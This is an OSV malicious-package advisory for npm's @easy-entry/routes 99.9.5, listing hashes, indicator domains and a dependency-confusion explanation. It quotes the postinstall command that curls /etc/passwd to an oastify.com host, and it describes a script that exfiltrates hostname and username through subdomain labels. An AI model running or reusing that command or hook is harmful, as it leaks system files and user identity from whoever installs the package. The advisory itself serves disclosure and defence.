MAL-2026-5410

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/routes/MAL-2026-5410.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5410
Published
2026-06-09T17:18:48Z
Modified
2026-06-09T18:01:29.964149945Z
Summary
Malicious code in @easy-entry/routes (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (29029f04aa1f06f388096de7cfdda12b92ce4c8dc68c2fe3e6091b318a521516)

On npm install, the postinstall hook declared in the package's package.json runs curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, which POSTs the contents of /etc/passwd to an attacker-controlled Burp Collaborator subdomain prefixed with the installer's hostname. The same hook executes scripts/scream3gg.js, which hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues an HTTP fetch to http://<hex>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com, exfiltrating the installer's identity in the subdomain label. The package has no legitimate functionality; it ships only the exfiltration payload. The scoped name @easy-entry/routes combined with the implausibly high version 99.9.5 matches the usual dependency-confusion pattern, in which a public package is published to win resolution against an internal-only package of the same name.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:18:48Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "1519bae164552d25b7e45c1361d040210e637c9f8a304aa807aae7c56ce008a3",
            "id": "IN-MAL-2026-005022",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.565861237Z"
        },
        {
            "modified_time": "2026-06-09T17:18:48Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "29029f04aa1f06f388096de7cfdda12b92ce4c8dc68c2fe3e6091b318a521516",
            "id": "IN-MAL-2026-005021",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.507715578Z"
        }
    ]
}

Affected packages

npm / @easy-entry/routes

Package

Name
@easy-entry/routes
Purl
pkg:npm/%40easy-entry%2Froutes

Affected ranges

Affected versions

99.*
99.9.5

Database specific

indicators
{
    "domains": [
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e2d313565636264646432306339.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "evidence_files": [
        {
            "sha256": "d2c42cb3e048d3dac528680c12fc15140474c725d1a99ea3d79dee1c1a403028",
            "tlsh": "ecd023b07c10c77379cd07b78128a1457d55c95f1304bd6645dfc7e4911437178eb906",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-VJ8f+q8rpJxjTAIowzuJI4Jk0EhTcn8Bv1S5bHUucNWd3ZK/1i1N0fL3/CBA82Mr1K7SbtJmPNiOmQP/Nl1gYQ==",
                "sha1": "1473c4cc351bd4e0d3d2404317e797fd5bb015b7"
            },
            "filename": "routes-99.9.5.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/routes/MAL-2026-5410.json"